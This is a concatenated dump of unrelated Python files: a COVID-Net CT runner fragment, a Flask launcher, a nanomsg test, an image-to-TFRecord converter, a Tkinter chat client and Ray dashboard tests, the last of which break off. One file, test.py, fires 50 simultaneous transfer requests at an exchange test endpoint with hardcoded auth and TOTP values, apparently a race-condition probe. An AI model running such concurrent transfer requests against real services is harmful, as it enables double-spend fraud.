feed_dict = {IMAGE_INPUT_TENSOR: image, TRAINING_PH_TENSOR: False}
# Run inference
with self.graph.as_default():
# Add training placeholder if present
try:
self.sess.graph.get_tensor_by_name(TRAINING_PH_TENSOR)
feed_dict[TRAINING_PH_TENSOR] = False
except KeyError:
pass
# Run image through model
class_, probs = self.sess.run([CLASS_PRED_TENSOR, CLASS_PROB_TENSOR], feed_dict=feed_dict)
print('\nPredicted Class: ' + CLASS_NAMES[class_[0]])
print('Confidences: ' + ', '.join(
'{}: {}'.format(name, conf) for name, conf in zip(CLASS_NAMES, probs[0])))
print('**DISCLAIMER**')
print('Do not use this prediction for self-diagnosis. '
'You should check with your local authorities for '
'the latest advice on seeking medical assistance.')
def _add_optimizer(self, learning_rate, momentum, fc_only=False):
"""Adds an optimizer and creates the train op"""
# Create optimizer
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
# Create train op
global_step = tf.train.get_or_create_global_step()
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
grad_vars = optimizer.compute_gradients(loss)
if fc_only:
grad_vars = dense_grad_filter(grad_vars)
minimize_op = optimizer.apply_gradients(grad_vars, global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
train_op = tf.group(minimize_op, update_ops)
# Initialize
self.sess.run(tf.global_variables_initializer())
return train_op
def get_gradients(self, learning_rate, momentum):
# Create optimizer
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
grad_vars = optimizer.compute_gradients(loss)
return grad_vars
def apply_gradients(self, learning_rate, momentum, gradients, fc_only=False):
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
# Create train op
global_step = tf.train.get_or_create_global_step()
if fc_only:
gradients = dense_grad_filter(gradients)
minimize_op = optimizer.apply_gradients(gradients, global_step)
# update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# train_op = tf.group(minimize_op, update_ops)
# return train_op
return minimize_op
def _get_validation_fn(self, batch_size=1, val_split_file='val.txt'):
"""Creates validation function to call in self.trainval() or self.test()"""
# Create val dataset
dataset, num_images, batch_size = self.dataset.validation_dataset(val_split_file, batch_size)
dataset = dataset.repeat() # repeat so there is no need to reconstruct it
data_next = dataset.make_one_shot_iterator().get_next()
num_iters = ceil(num_images / batch_size)
# Create running accuracy metric
metrics = Metrics()
# Create feed and fetch dicts
fetch_dict = {'classes': CLASS_PRED_TENSOR}
feed_dict = {}
# Add training placeholder if present
try:
self.sess.graph.get_tensor_by_name(TRAINING_PH_TENSOR)
feed_dict[TRAINING_PH_TENSOR] = False
except KeyError:
pass
def run_validation():
metrics.reset()
for i in range(num_iters):
data = self.sess.run(data_next)
feed_dict[IMAGE_INPUT_TENSOR] = data['image']
results = self.sess.run(fetch_dict, feed_dict)
metrics.update(data['label'], results['classes'])
return metrics.values()
return run_validation
@staticmethod
def _log_and_print_metrics(metrics, step=None, summary_writer=None, tag_prefix='val/'):
"""Helper for logging and printing"""
# Pop temporarily and print
cm = metrics.pop('confusion matrix')
print('\tconfusion matrix:')
print('\t' + str(cm).replace('\n', '\n\t'))
# Print scalar metrics
for name, val in sorted(metrics.items()):
print('\t{}: {}'.format(name, val))
# Log scalar metrics
if summary_writer is not None:
summary = simple_summary(metrics, tag_prefix)
summary_writer.add_summary(summary, step)
# Restore confusion matrix
metrics['confusion matrix'] = cm
def _get_train_summary_op(self, tag_prefix='train/'):
loss = self.graph.get_tensor_by_name(LOSS_TENSOR)
loss_summary = tf.summary.scalar(tag_prefix + 'loss', loss)
return loss_summary
def main():
# global s
# global port
# global MAX_WORKERS
global gradients_q
global global_var_vals
global ack_q
global done_flag
# port = int(sys.argv[1])
# MAX_WORKERS = int(sys.argv[2])
# port = 17000
# MAX_WORKERS = 1
gradients_q = Queue()
ack_q = Queue()
manager = Manager()
global_var_vals = manager.Value(c_char_p, "")
done_flag = manager.Value('i', 0)
# n = int(FLAGS.max_steps / MAX_WORKERS)
# print("Each worker does ", n, " iterations")
process_list = []
for i in range(MAX_WORKERS):
process_port = port + i + 1
p = Process(target=handleWorker, args=(process_port, gradients_q, done_flag, global_var_vals, ack_q, num_iters))
p.start()
process_list.append(p)
# Suppress most TF messages
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
mode, args = parse_args(sys.argv[1:])
# Create full paths
meta_file = os.path.join(args.model_dir, args.meta_name)
ckpt = os.path.join(args.model_dir, args.ckpt_name)
# Create runner
if mode == 'train':
train_kwargs = dict(
lr=args.learning_rate,
momentum=args.momentum,
fc_only=args.fc_only,
max_bbox_jitter=args.max_bbox_jitter,
max_rotation=args.max_rotation,
max_shear=args.max_shear,
max_pixel_shift=args.max_pixel_shift,
max_pixel_scale_change=args.max_pixel_scale_change
)
else:
train_kwargs = {}
runner = COVIDNetCTRunner(
meta_file,
ckpt=ckpt,
data_dir=args.data_dir,
input_height=args.input_height,
input_width=args.input_width,
**train_kwargs
)
if mode == 'train':
# Create output_dir and save run settings
output_dir = os.path.join(OUTPUT_DIR, MODEL_NAME + args.output_suffix)
# os.makedirs(output_dir, exist_ok=False)
# with open(os.path.join(output_dir, 'run_settings.json'), 'w') as f:
# json.dump(vars(args), f)
# Run trainval
runner.trainval(
args.epochs,
output_dir,
batch_size=args.batch_size,
train_split_file=args.train_split_file,
val_split_file=args.val_split_file,
log_interval=args.log_interval,
val_interval=args.val_interval,
save_interval=args.save_interval
)
elif mode == 'test':
# Run validation
runner.test(
batch_size=args.batch_size,
test_split_file=args.test_split_file,
plot_confusion=args.plot_confusion
)
elif mode == 'infer':
# Run inference
runner.infer(args.image_file, not args.no_crop)
if __name__ == '__main__':
main()
|
brainless.py
|
"""
Brainless launcher
"""
from flask import render_template
from configuration import app, db
from datetime import datetime
import continuous_threading
from daemons.sync import sync_accounts
# Create a URL route in our application for "/"
@app.route('/')
def brainless():
print('BBRRRAAAIIIINNNNSSSS')
# background workder daemons
sync_daemon = continuous_threading.PeriodicThread(10,target=sync_accounts)
brainless_daemon = continuous_threading.PausableThread(target=brainless)
#@app.before_first_request
def _run_on_start():
"""
Responsible for all needed operations
before starting the full application
"""
db.metadata.create_all(db.engine)
#sync_daemon.start()
#brainless_daemon.start()
def home():
"""
This function just responds to the browser URL
localhost:5000/
:return: the rendered template 'home.html'
"""
return render_template('home.html')
# If we're running in stand alone mode, run the application
if __name__ == '__main__':
_run_on_start()
app.run(host='0.0.0.0', port=5000, debug=True, use_reloader=False)
|
test_pipeline_threaded.py
|
import unittest
import threading
import nanomsg as nn
class ThreadedPipelineTest(unittest.TestCase):
def test_pipeline(self):
result = []
def ping(url, ack):
with nn.Socket(protocol=nn.NN_PUSH) as sock, sock.connect(url):
sock.send(b'Hello, world!')
# Shutdown the endpoint after the other side ack'ed;
# otherwise the message could be lost.
ack.wait()
def pong(url, ack):
with nn.Socket(protocol=nn.NN_PULL) as sock, sock.bind(url):
message = sock.recv()
result.append(bytes(message.as_memoryview()).decode('ascii'))
ack.set()
ack = threading.Event()
url = 'inproc://test'
threads = [
threading.Thread(target=ping, args=(url, ack)),
threading.Thread(target=pong, args=(url, ack)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(['Hello, world!'], result)
if __name__ == '__main__':
unittest.main()
|
test.py
|
# coding=utf-8
import requests
import json
from time import time
import threading
import csv
data = {
"coin_type": "BSV",
"flat_amount": "99900",
"totp_captcha": {"validate_code": "111111", "sequence": ""}
}
# 定义需要进行发送的数据
# 定义一些文件头
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Authorization': '53383C06B6E449FFB5444432B456F72E'
}
# 创建请求函数
def Clean():
# 接口的url
requrl = "http://test2.coinex.com/res/credit/to/flat?X-CSRF-TOKEN=DI12i7hp"
# 连接服务器
# 发送请求
response = requests.post(requrl, headers=headers, data=json.dumps(data))
# 打印请求状态
print(response.json())
# 创建数组存放线程
threads = []
# 创建100个线程
for i in range(50):
# 针对函数创建线程
t = threading.Thread(target=Clean, args=())
# 把创建的线程加入线程组
threads.append(t)
# print('start:')
if __name__ == '__main__':
# 启动线程
for i in threads:
i.start()
# keep thread
for i in threads:
i.join()
#print('end:', ctime())
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
client.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import random
import tkinter
import webbrowser
import tkinter.messagebox
messages_sent_count = 0
connected = False
def display(text):
global chat_display
if not text.startswith('['):
text = '[CLIENT] ' + text
print(text)
random_message_id = random.randint(1000000000, 9999999999)
chat_display.config(state='normal')
if text.startswith('[CLIENT] ERROR') or text.startswith('[SERVER] ERROR'):
chat_display.tag_config(random_message_id, font=('Consolas', 20, 'bold'), foreground='red')
chat_display.insert('end', text + '\n', random_message_id)
else:
chat_display.tag_config(random_message_id, font=('Consolas', 20))
chat_display.insert('end', text.split()[0] + ' ', random_message_id)
chat_display.insert('end', ' '.join(text.split()[1:]) + '\n')
chat_display.see('end')
chat_display.config(state='disabled')
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode('utf8')
display(msg)
if '<LINK>' in msg:
webbrowser.open(msg.split('<LINK>')[1])
except (OSError, NameError): # Possibly client has left the chat or no connection is established yet
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
global IP
global PORT
global window
global connected
global messages_sent_count
if connected:
global client_socket
msg = message_var.get()
message_var.set('') # Clears input field.
if messages_sent_count == 1:
window.title(msg)
else:
try:
client_socket.send(bytes(msg, 'utf8'))
if msg == 'quit':
client_socket.close()
window.quit()
except NameError:
display('ERROR: Connection failed. Try restarting and choosing another server.')
messages_sent_count += 1
def on_closing(event=None):
"""This function is to be called when the window is closed."""
message_var.set('quit')
send()
window = tkinter.Tk()
window.geometry('800x500')
window.config(background='#111111')
window.title('Login')
messages_frame = tkinter.Frame(window, borderwidth=0, highlightthickness=0, bd=0)
message_var = tkinter.StringVar() # For the messages to be sent.
scrollbar = tkinter.Scrollbar(messages_frame, borderwidth=0, highlightthickness=0, bd=0) # To navigate through past messages.
# Following will contain the messages.
chat_display = tkinter.Listbox(
messages_frame,
height=13,
width=50,
font=('Consolas', 20),
yscrollcommand=scrollbar.set,
xscrollcommand=scrollbar.set,
bg='#111111',
fg='green',
highlightcolor='red'
)
chat_display = tkinter.Text(
messages_frame,
height=13,
width=50,
font=('Consolas', 20),
yscrollcommand=scrollbar.set,
xscrollcommand=scrollbar.set,
bg='#111111',
fg='green',
highlightcolor='red',
selectbackground='red',
selectforeground='green',
relief='flat',
)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
chat_display.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
chat_display.pack()
messages_frame.pack()
send_frame = tkinter.Frame(
window,
bd=0,
bg='#111F11',
relief='flat',
)
send_frame.pack(side='bottom', fill='x')
entry_field = tkinter.Entry(
send_frame,
textvariable=message_var,
bg='#111F11',
fg='green',
font=('Consolas', 20, 'bold'),
width=46,
relief='flat',
cursor='xterm green',
insertbackground='green',
)
entry_field.bind('<Return>', send)
entry_field.pack(side='left')#fill='x')
entry_field.focus_set()
send_button = tkinter.Button(
send_frame,
text='▶',
command=send,
bg='#111111',
fg='green',
width=3,
relief='flat',
activebackground='black',
highlightcolor='black',
highlightbackground='black',
activeforeground='green',
font=('Consolas', 24),
)
send_button.pack(side='right')#side='bottom', fill='x')
window.protocol('WM_DELETE_WINDOW', on_closing)
# Socket connection setup
IP = 'localhost'
PORT = 1183
BUFSIZ = 1024
# display(f'Please type in a "<IP>:<PORT>" to connect to. Or press enter to use {IP}:{PORT}')
def run_gui():
tkinter.mainloop() # Starts GUI execution.
if not connected:
# if ':' in msg:
# (IP, PORT) = msg.split(':')
(IP, PORT) = 'localhost', 1183
client_socket = socket(AF_INET, SOCK_STREAM)
try:
client_socket.connect((IP, PORT))
except Exception as e:
display(f'ERROR: Could not connect to "{IP}:{PORT}". Check if the server is running. <{e}>')
else:
display('You have been successfully connected to the server!')
receive_thread = Thread(target=receive)
receive_thread.start()
connected = True
print(5)
run_gui()
|
test_node.py
|
import os
import sys
import logging
import requests
import time
import traceback
import random
import pytest
import ray
import threading
from datetime import datetime, timedelta
from ray.cluster_utils import Cluster
from ray.dashboard.modules.node.node_consts import (LOG_PRUNE_THREASHOLD,
MAX_LOGS_TO_CACHE)
from ray.dashboard.tests.conftest import * # noqa
from ray._private.test_utils import (
format_web_url, wait_until_server_available, wait_for_condition,
wait_until_succeeded_without_exception)
logger = logging.getLogger(__name__)
def test_nodes_update(enable_test_module, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
timeout_seconds = 10
start_time = time.time()
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/test/dump")
response.raise_for_status()
try:
dump_info = response.json()
except Exception as ex:
logger.info("failed response: %s", response.text)
raise ex
assert dump_info["result"] is True
dump_data = dump_info["data"]
assert len(dump_data["nodes"]) == 1
assert len(dump_data["agents"]) == 1
assert len(dump_data["nodeIdToIp"]) == 1
assert len(dump_data["nodeIdToHostname"]) == 1
assert dump_data["nodes"].keys() == dump_data[
"nodeIdToHostname"].keys()
response = requests.get(webui_url + "/test/notified_agents")
response.raise_for_status()
try:
notified_agents = response.json()
except Exception as ex:
logger.info("failed response: %s", response.text)
raise ex
assert notified_agents["result"] is True
notified_agents = notified_agents["data"]
assert len(notified_agents) == 1
assert notified_agents == dump_data["agents"]
break
except (AssertionError, requests.exceptions.ConnectionError) as e:
logger.info("Retry because of %s", e)
finally:
if time.time() > start_time + timeout_seconds:
raise Exception("Timed out while testing.")
def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard):
@ray.remote
class Actor:
def getpid(self):
print(f"actor pid={os.getpid()}")
return os.getpid()
actors = [Actor.remote(), Actor.remote()]
actor_pids = [actor.getpid.remote() for actor in actors]
actor_pids = set(ray.get(actor_pids))
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
node_id = ray_start_with_dashboard["node_id"]
timeout_seconds = 10
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/nodes?view=hostnamelist")
response.raise_for_status()
hostname_list = response.json()
assert hostname_list["result"] is True, hostname_list["msg"]
hostname_list = hostname_list["data"]["hostNameList"]
assert len(hostname_list) == 1
hostname = hostname_list[0]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["hostname"] == hostname
assert detail["raylet"]["state"] == "ALIVE"
assert "raylet" in detail["cmdline"][0]
assert len(detail["workers"]) >= 2
assert len(detail["actors"]) == 2, detail["actors"]
assert len(detail["raylet"]["viewData"]) > 0
actor_worker_pids = set()
for worker in detail["workers"]:
if "ray::Actor" in worker["cmdline"][0]:
actor_worker_pids.add(worker["pid"])
assert actor_worker_pids == actor_pids
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
assert len(summary["data"]["summary"]) == 1
summary = summary["data"]["summary"][0]
assert summary["hostname"] == hostname
assert summary["raylet"]["state"] == "ALIVE"
assert "raylet" in summary["cmdline"][0]
assert "workers" not in summary
assert "actors" not in summary
assert "viewData" not in summary["raylet"]
assert "objectStoreAvailableMemory" in summary["raylet"]
assert "objectStoreUsedMemory" in summary["raylet"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
@ray.remote
class ActorWithObjs:
def __init__(self):
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
my_obj = ray.put([1, 2, 3] * 100) # noqa
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
resp = requests.get(
webui_url + "/memory/set_fetch", params={"shouldFetch": "true"})
resp.raise_for_status()
def check_mem_table():
resp = requests.get(f"{webui_url}/memory/memory_table")
resp_data = resp.json()
assert resp_data["result"]
latest_memory_table = resp_data["data"]["memoryTable"]
summary = latest_memory_table["summary"]
# 1 ref per handle and per object the actor has a ref to
assert summary["totalActorHandles"] == len(actors) * 2
# 1 ref for my_obj. 2 refs for self.obj_ref for each actor.
assert summary["totalLocalRefCount"] == 3
assert wait_until_succeeded_without_exception(
check_mem_table, (AssertionError, ), timeout_ms=10000)
def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
@ray.remote
class ActorWithObjs:
def __init__(self):
print("I also log a line")
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
timeout_seconds = 20
start_time = time.time()
last_ex = None
def check_node_details():
resp = requests.get(f"{webui_url}/nodes?view=details")
resp_json = resp.json()
resp_data = resp_json["data"]
clients = resp_data["clients"]
node = clients[0]
assert len(clients) == 1
assert len(node.get("actors")) == 2
# Workers information should be in the detailed payload
assert "workers" in node
assert "logCount" in node
# Two lines printed by ActorWithObjs
assert node["logCount"] >= 2
print(node["workers"])
assert len(node["workers"]) == 2
assert node["workers"][0]["logCount"] == 1
while True:
time.sleep(1)
try:
check_node_details()
break
except (AssertionError, KeyError, IndexError) as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
